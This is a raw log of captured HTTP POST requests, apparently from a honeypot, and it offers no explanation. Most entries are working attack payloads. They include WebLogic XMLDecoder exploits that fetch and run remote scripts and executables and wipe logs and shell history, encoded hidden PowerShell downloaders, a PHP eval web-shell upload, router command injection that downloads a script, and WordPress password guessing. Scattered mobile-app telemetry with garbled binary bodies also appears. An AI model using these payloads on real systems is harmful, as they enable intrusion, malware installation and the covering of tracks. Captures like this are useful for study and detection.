User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umengcloud.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2494

1.0517e9b7f56240b158d00af66@2a5557b6525c7ee069ecfe09c5af4174433522e955975e55361aaa93d1893159–˚íìàNËxú≠XisõJ˝+)}ö7q˘5ÕN’˚Ä"≤›ç%#a•\$±(Hh!¡>∑Òöƒôd*.U,Õ]Œ=˜ÙE_{ã*:ı¥ØΩÂzfl”˛Ûµß$<‡∫»ıU8W%e8J}dJ}Ö”E‹-J£û÷ªŒÉì]ˆŒzwM±)Éb	˜¬™8œ”r-∑ÎÌÆâ“Í|Sm¬`w~]m¡VÔ∂=çTIEA<ÎÈv∆‡}‹ª?˚⁄ªÆó€mwuˆ~ÆT^·Ó?3Û…eYí˚܆ã∫"cIíyQUD+∆{¶à∞¢b·uä¸7)ÚÔó"¬™åfº3hUUú/'¡n˘GFyE¯≥≥s≥jÛS.œÆ˛<v
)í^√$~ì¯~0	HUeÂOcøi¬%¥ÔÕ´Ô	ç,ÕÁ˚œgΩ-êVÂ∂„k–Ï™M/ÆÿŸ›Ôªãö:ÿÅ©û&2«lw¡+R†´–ä$Îí!!ÅódöCaY7xsúÿ›Ì“Œ”Cƒ–YHî≈ÔÃJ≤™É’*
ô‹D’°Ã´ ∫{æ')XVπ≥^≥˘ˆ>Vd§J˜gΩe˝‡¯…ΩO‚ËAfi	IIÑt¯g,):oc	|‚Â{√䙸MÖÁDU¸M¯$Òo°©™]¯>hv…ãÔä'«)ò¡Ûó˚‘õxÇò©ò„0åÑ_·©JB?‚)@LÍ€xB”ú¸>xv…À¨Ì¡U≤¢eÕ‚\iæåÓÍÂófπeö
ù0›mõ≈Ó¥aé>›\ΡZ∞Ÿ¨óù~pÚR]»+Q¬Zp¢!¨$ÈaÕ›~Yo;ß=|Œù3 AÑ´ºy৫©˝õC
ÇèKÔ¬*O∫7ZÓ”pyW¿çì—· 1ô¢
6mU¬2˘y’A÷¨)–^Ä4E“BISm≈kJƒ§øÿ‘iπcª⁄°!}æÚo'õÖ;ı«D∂„!̓q∆GjòÓ«ÍKΩØ∏[kêdæ°lcÕy·h6=ÿ9Ÿñ)˙Ÿîüó∂abœù•‘ô
∂E◊¥ò•∂3mı>›,Jä<˜∏Ω≈√C8T±{—Æ⁄X˙Ùtïô
IA[≥YË]Zìıº$Ì∞2∞`M
öç1Ã÷kÛ¬s»ë¥˛ö¥·ÅXômÃ
<w™8oB~í,¨„ √I≤(ƒ|—è/Á´{Û©uLñìo}=yÚ⁄IBò'Yx≤ç¯H€ìv∂¶å∂¥-“óàÛ“w¶˙‡73y≤NùÒâ8&Ô[√‘7fπÁN vÇ¿öe∂‘5O∂K!;¿Œ0u”z…fi@O2€—Å8·é$&∆Z"ÌXÇäπx+IÛ≤Ò∫Z≠}É˝bµöä‘ıjLO‘I͉	1¬£áâ@≥√s‰9±hªÑ”ıÕ>‰^röóê∫ ∆
Ìˇ$+#I)æH®;∆ÄÚ
`û
`ù£≠	ÁÊ
òLöÍÛRøıºæcÓ»	µ√]m7uAg«∏Ú≠1 Îß‘ùà1…mgñ¯NízÿÉ*Ù
πPã¶4Êê=X10$÷≠†»QdÕNñ>j!F)˝“||àëÆâ°`)%ÌTÙ
[∆T®-0Ö ‚SbçDflù|käY∆≠mÑ∫aâ˚[ÏoB`Ï-fl∂ƒ∆“ù˝,^Œkßbåœ5y/ã2|k¸lò@7	¨ü£Îü^≥Úw8I≤>X#
ÓÑò:&Xùr¿XÇàsë{Õ†æÿ˛˜?ÕvÅ;ˆ>cû∂fŸñámñm1E~·'Ûí:ìƒf} p8æÌ◊œ¢úì5dîêl}¥
`çÎÁ6e®HÃ˘ôâY◊«˙p<ÚFdqRÀ„°
ó5t“:Ig¨‡@7NûK°ÆD‘ı˛ô≥9tıÆ⁄>IMGù@~yN‰Afl¬†ÆS&—=«º∫¥…çyıÚÍã按Ón'ÿ´&•„¯Y#UP≥˝é‹EïÖ—›•aêfl=Ë˚+—
 fѪ¶Ó\fl¶AU§›‡Ãˆ´pùñq߆)√∆ˇt±‹…ä°o¥~∆¯O
S`à ôâ¸dÅj…Ωúg:`ÅèλÂ6~?Æ®1L<–®sÊÍc˙ˆ¨°´“⁄NíáıÕÅ¡G€11MW∫∏%èÕ¿ÂÚ`_€Ü«€∆àıá1j·Ä˛á˚tøÒ`Ôt†ÎQ„flF‹¬Õ◊V_\ÉŒù|®)iP⁄<Ò≤ãúZ>”"PÜ6ÀÄ5qÎ&ùµ#ÓÍ≠ÎòKºc<Ò]üí◊zí̃0_≤≠±;ˇ˚Úcû
ã˚%Õ√"OĈ#ÍRñ™3)@º‹èØWY˘⁄/LÔ¬àÅæ $mû¡~wÙúÒÑ&ß'$xNx∏r÷ÿámäX ö–‹qqxÔJ±ÛçÈˇlÑÔ⁄‡π< S±Óg˝¯•HÉó"˝ø%öóèE“-}≤Ò-?πå∂µÄàâfi	âk¢+g,¯ Î Q< ëSxfilΩ–UQÇÿ˙±±páŸe2^ÅÑo@*êÉMA⁄J˚Â1¯RËÀ7
=/fl*ıÎBÉ7+ƒ≥S‡∑ózÃyÜÀ;ÿìÖ‚eyqPSz/}#‰I·Å5&ÄûËŧ˚Pk®+GŸ®–IÊ∏Óoy–ΩÔ®b
±˝ºÖ:,Óls©+lÉÁfiÅd√⁄gVȆ4ù–TÏ„R/£∫J£«…lõ∆e¿⁄õ˝q¿kA„±¶⁄i≤¢!^ì
çÁ4,kH“åŶ5i†≤6ÇÖp”0ã≤ó?\◊ù™˛P/˜∏ˇ⁄À˘_›®ÆgFe∫≠_Iôt錒fi≥=~> 
ñÊFÊ^û.͆å^+TÙ1ç≠˘flº≈Ç≠örW≥iudt`ºÚ%ú√Ø”µ"·:íeº^YIj∞¿Kaµ
D!Pó1∫Yˇ·”˘)´Á˘ö•8$ø˝JLª,.ù©"\w”iXîa7?#éMøyP∆
†∑RV±0	 ≤{˛{afl˛fl|‹#A‰û0B˲˛ø∆ŸI˝@c20b79b6915787e080e7f40909a447746e3e5de92f9c8155d511969388820300 a330878c9d6a1fcb1ba7aa091fd13673

POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=17&ac=50&pos=32518&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.banner","des":"","sug":-1}]

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /adminManager!login HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: x.x.x.x:8080
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive



POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache

QqMLwdnPMDYtUQS86uXsHCLRqfhu3UxZJ9LbRIr02HO7p6pH99Iqv/kYuwop1NpwcmlH+kvoqJ0gdfi+Hxml29bGwb1TnuQfOEqmJ5/tlS1V4vag9Duh0RN/5KvItIM3/JREIvV9zoaI5vPyDs7aXQg5jbblaqFCwf3t3Qcbc+MaTuewMNKmzZKBspKfYEoQHTenhzq0ahhxrj4bVa9EzqaTZjAMLXsClz+8gYWInU3aT+jItBjBdyzDMSLCEhHU0PwYCfPusFlsZX1VaMKd8e3Js9OuJXfk7EQ9eMBF7KBsdALaiVlG62waU9Pf0oIRZzHOfGi92BuBx4Lrzq/6uWySOobGbIOUbL5DyGmumSazS/Y58CCMRTwsHHDkx11T+qMqQg==

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die((string)(111111111*9));

POST http://best-proxies.ru/azenv.php?rand=be64e0931f72da652d73f8fb6073c527 HTTP/1.1
Cookie: testCookie=true
Host: best-proxies.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: http://best-proxies.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=batman

POST http://boys-here.com/nntesto/http.php HTTP/1.0
Accept: */*
Referer: http://boys-here.com/nntesto/http.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Host: boys-here.com
Content-Type: application/x-www-form-urlencoded
Content-length: 13
Pragma: no-cache

xrumer=inside

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache

QPQLx46eYd+lsBWHFD+RHFrK19m4/5MHRUOnMcx1ZkKV9k6VvRmM4Y0VUHpcxtunkDKzJPIs82DH5T99NTfH1mchkT0RAHYn8Jj4NOPcSNohNneV/iGfBHHt36theM8Y3NqwYwmbv6JMOpnodBVmGWK2v/01g1EXb/r6ANN+I8e0hqyyeoDHkgUIKQOkHqcPBLFbjKcNU3SNKajcDvqtQLpA98VjCmeTTxnxCjxc+30o05sKUNqSNsO0fAKdTQk4iLHtgTjYqqTqKmViz/vZXT5Lejmaa3d/H2zBJZM0+H1v8ytTy4/qoQZUWLoWSIi8JFaW/ze27tfPpIcmPHE09cvuvY4izr8HbYo/e8denE1CzM1d3Dx0bYuG/uKhxiaW6oCQHrIgBrMLcccvZA==

POST http://check.proxyradar.com/azenv.php?auth=149300688035&a=PSCMN&i=3483038180&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1067
Content-Type: multipart/form-data; boundary=INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

119707
--INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

ae17a9b8250bc3bffc733df350d0804f
--INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J--


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache

FKZbxtvJNbqXL+vh4e7nezy2ggj3rJnyBPNXrRUfWVaDBmQBoEfDgJl/f1KsxnpAIw/7fQ4RuW4Tn1gU0rL1QyB3duyWBPgj9htA3bHVz4kpjmb3KyrrjUtNlKw+2bR4w/qLY9rU5/5TLGxSM83nEqLhV2XPPun0MEAlqPDv0Jh/qAeSTei4zXuFwC6PNoyDs2TLNtov8z/jayPdGfJLr88o+XWqEmHL1FaVWU8wB4VkFsai3EzVwN48ZRw9m5nK0oXi0f6xk1h2nN+5m+FP0yZglwmz+PuYVP8VuttQe83WZDM0tyakpfnx5FZKjJbKdNu95OyzEoP5PdwQc7ohoke6K8/RZXjWWOF52vBkv4YdVxCqxxgZt3Z/kcX3x2jUYzyc75m2IgtrWwLY90k33hB4QsDZdrSsou8ayfZuG0g=

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
I™cÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl

POST /cgi?7 HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
"Content-Type": text/plain
"Referer": 139.59.32.227/mainFrame.htm
Content-Length: 44
Content-Type: application/x-www-form-urlencoded

[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0


POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=149591747639&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /command.php HTTP/1.1
Accept: */*
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208

cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74

POST /license.php HTTP/1.1
Referer: http://www.jamesatchue.com/wp-admin/
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Accept: */*
Content-Type: multipart/form-data; boundary=(UploadBoundary)
Host: www.jamesatchue.com
Content-Length: 303
Connection: Close

--(UploadBoundary)
Content-Disposition: form-data; name="filename"; filename="07545460.php"
Content-Type: application/x-php

111111111111111111111111111111114955012931495501293<?php @eval($_POST['c']); die();?>
--(UploadBoundary)
Content-Disposition: form-data; name="1"

1
--(UploadBoundary)


POST /hndUnblock.cgi HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://t2.proxy-checks.com/favicon.ico HTTP/1.1
Host: t2.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST http://appinfocdn.ksmobile.net/gmi HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: appinfocdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 199

«ì≠Kb—ó;eò@YMp<%iÅ˝Yª?ffA0#]UAIeJD‰ßB‹ßejÅÓMúyíi∆(8x[lïAéG÷ŸpŸ0U¢±±U¨Œ§\e2.fYîœ)Ú}JüHì›˛^&nc˘s ı짩^ª.≈9÷I’Ÿ	P"µ⁄îr’´T*√îtflùÅËLXFÉ5¿îÊ1ë√Ó€}i$X9·X¯)P0—Ú-ô]À?6‹œwπÌp8√Õm`~§ìñ

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /command.php HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 208

cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
t(ÛÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îgFY›∆√«∆fl

POST http://check.proxyradar.com/azenv.php?auth=149613307967&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
